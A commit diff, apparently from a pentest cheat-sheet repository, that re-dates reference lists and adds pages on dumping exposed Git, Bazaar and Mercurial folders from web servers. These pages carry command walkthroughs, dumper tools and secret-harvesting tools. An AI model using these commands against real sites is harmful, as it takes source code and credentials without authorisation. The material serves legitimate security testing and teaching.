References updated for IDOR, Radomness and SCM

Author: swisskyrepo

Insecure Direct Object References/README.md

@@ -26,7 +26,7 @@
 
 ## Labs
 
-* [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
+- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
 
 
 ## Exploit
@@ -132,13 +132,13 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
 
 ## References
 
-* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
-* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
-* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
-* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
-* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 
-* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
-* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres)
-* [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
-* [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor)
-* [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor)
+- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
+- [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
+- [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
+- [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://youtu.be/wx5TwS0Dres)
+- [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
+- [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://portswigger.net/web-security/access-control/idor)
+- [Testing for IDORs - PortSwigger - October 29, 2024](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
+- [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
+- [The Rise of IDOR - HackerOne - April 2, 2021](https://www.hackerone.com/company-news/rise-idor)
+- [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)

Insecure Management Interface/README.md

@@ -1,5 +1,12 @@
 # Insecure Management Interface
 
+## Summary
+
+* [Springboot-Actuator](#springboot-actuator)
+  * [Remote Code Execution via /env](#remote-code-execution-via-env)
+* [References](#references)
+
+
 ## Springboot-Actuator
 
 Actuator endpoints let you monitor and interact with your application. 
@@ -88,7 +95,8 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: 0
 ```
 
+
 ## References
 
-* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
-* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
+- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
+- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)

Insecure Randomness/README.md

@@ -166,10 +166,10 @@ Generic identification and sandwitch attack:
 
 ## References
 
-* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
-* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
-* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html)
-* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)
-* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#)
-* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
-* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - 06 January, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
+- [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
+- [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
+- [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)*
+- [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)*
+- [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
+- [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
+- [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)

Insecure Source Code Management/Bazaar.md

@@ -0,0 +1,47 @@
+# Bazaar
+
+## Summary
+
+* [Tools](#tools)
+    * [rip-bzr.pl](#rip-bzrpl)
+    * [bzr_dumper](#bzr_dumper)
+* [References](#references)
+
+
+## Tools
+
+### rip-bzr.pl
+
+```powershell
+wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
+docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
+```
+
+### bzr_dumper
+
+```powershell
+git clone https://github.com/SeahunOh/bzr_dumper
+python3 dumper.py -u "http://127.0.0.1:5000/" -o source
+Created a standalone tree (format: 2a)
+[!] Target : http://127.0.0.1:5000/
+[+] Start.
+[+] GET repository/pack-names
+[+] GET README
+[+] GET checkout/dirstate
+[+] GET checkout/views
+[+] GET branch/branch.conf
+[+] GET branch/format
+[+] GET branch/last-revision
+[+] GET branch/tag
+[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
+[*] Finish
+
+$ bzr revert
+ N  application.py
+ N  database.py
+ N  static/
+```
+
+## References
+
+- [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380)

Insecure Source Code Management/Git.md

@@ -0,0 +1,221 @@
+# Git
+
+## Summary
+
+* [Example](#example)
+    * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
+    * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
+* [Tools](#tools)
+* [Automatic recovery](#automatic-recovery)
+    * [git-dumper.py](#git-dumperpy)
+    * [diggit.py](#diggitpy)
+    * [GoGitDumper](#gogitdumper)
+    * [rip-git](#rip-git)
+    * [GitHack](#githack)
+    * [GitTools](#gittools)
+* [Harvesting secrets](#harvesting-secrets)
+    * [trufflehog](#trufflehog)
+    * [Yar](#yar)
+    * [Gitrob](#gitrob)
+    * [Gitleaks](#gitleaks)
+* [Refererences]
+
+
+## Example
+
+The following examples will create either a copy of the .git or a copy of the current commit.
+
+Check for the following files, if they exist you can extract the .git folder.
+
+- .git/config
+- .git/HEAD
+- .git/logs/HEAD
+
+### Recovering file contents from .git/logs/HEAD
+
+1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
+2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
+  ```powershell
+  0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
+  15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <[email protected]> 1489390329 +0000        commit: Initial.
+  26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <[email protected]> 1489390330 +0000        commit: Whoops! Remove flag.
+  6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <[email protected]> 1489390332 +0000        commit: Prevent directory listing.
+  ```
+3. Access the commit using the hash
+  ```powershell
+  # create an empty .git repository
+  git init test
+  cd test/.git
+
+  # download the file
+  wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
+
+  # first byte for subdirectory, remaining bytes for filename
+  mkdir .git/object/26
+  mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
+
+  # display the file
+  git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
+      tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+      parent 15ca375e54f056a576905b41a417b413c57df6eb
+      author Michael <[email protected]> 1489390329 +0000
+      committer Michael <[email protected]> 1489390329 +0000
+      Initial.
+  ```
+4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+  ```powershell
+  wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
+  mkdir .git/object/32
+  mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
+
+  git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
+      040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
+      100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
+      040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
+      100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
+      040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
+  ```
+5. Read the data (flag.txt)
+  ```powershell
+  wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
+  mkdir .git/object/cb
+  mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
+  git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
+  ```
+
+### Recovering file contents from .git/index
+
+Use the git index file parser https://pypi.python.org/pypi/gin (python3).
+
+```powershell
+pip3 install gin
+gin ~/git-repo/.git/index
+```
+
+Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
+
+```powershell
+$ gin .git/index | egrep -e "name|sha1"
+name = AWS Amazon Bucket S3/README.md
+sha1 = 862a3e58d138d6809405aa062249487bee074b98
+
+name = CRLF injection/README.md
+sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
+```
+
+## Tools
+
+### Automatic recovery
+
+#### git-dumper.py
+
+```powershell
+git clone https://github.com/arthaud/git-dumper
+pip install -r requirements.txt
+./git-dumper.py http://web.site/.git ~/website
+```
+
+#### diggit.py
+
+```powershell
+git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
+./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
+./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
+
+-u is remote path, where .git folder exists
+-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
+-o is a hash of particular Git object to download
+```
+
+#### GoGitDumper
+
+```powershell
+go get github.com/c-sto/gogitdumper
+gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
+git log
+git checkout
+```
+
+#### rip-git
+
+```powershell
+git clone https://github.com/kost/dvcs-ripper
+perl rip-git.pl -v -u "http://web.site/.git/"
+
+git cat-file -p 07603070376d63d911f608120eb4b5489b507692
+tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
+parent 15ca375e54f056a576905b41a417b413c57df6eb
+author Michael <[email protected]> 1489389105 +0000
+committer Michael <[email protected]> 1489389105 +0000
+
+git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
+```
+
+#### GitHack
+
+```powershell
+git clone https://github.com/lijiejie/GitHack
+GitHack.py http://web.site/.git/
+```
+
+#### GitTools
+
+```powershell
+git clone https://github.com/internetwache/GitTools
+./gitdumper.sh http://target.tld/.git/ /tmp/destdir
+git checkout -- .
+```
+
+### Harvesting secrets
+
+#### trufflehog
+
+> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
+
+```powershell
+pip install truffleHog # https://github.com/dxa4481/truffleHog
+truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
+```
+
+#### Yar
+
+> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
+
+```powershell
+go get github.com/nielsing/yar # https://github.com/nielsing/yar
+yar -o orgname --both
+```
+
+#### Gitrob
+
+> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
+
+```powershell
+go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
+export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+gitrob [options] target [target2] ... [targetN]
+```
+
+#### Gitleaks
+
+> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
+
+```powershell
+# Run gitleaks against a public repository
+docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
+
+# Run gitleaks against a local repository already cloned into /tmp/
+docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks
+
+# Run gitleaks against a specific Github Pull request
+docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
+
+or
+
+go get -u github.com/zricethezav/gitleaks
+```
+
+
+## References
+
+- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)

Insecure Source Code Management/Mercurial.md

@@ -0,0 +1,22 @@
+# Mercurial
+
+## Summary
+
+* [Tools](#tools)
+    * [rip-hg.pl](#rip-hgpl)
+* [References](#references)
+
+
+## Tools
+
+### rip-hg.pl
+
+* [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG...
+    ```powershell
+    docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
+    ```
+
+
+## References
+
+* [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)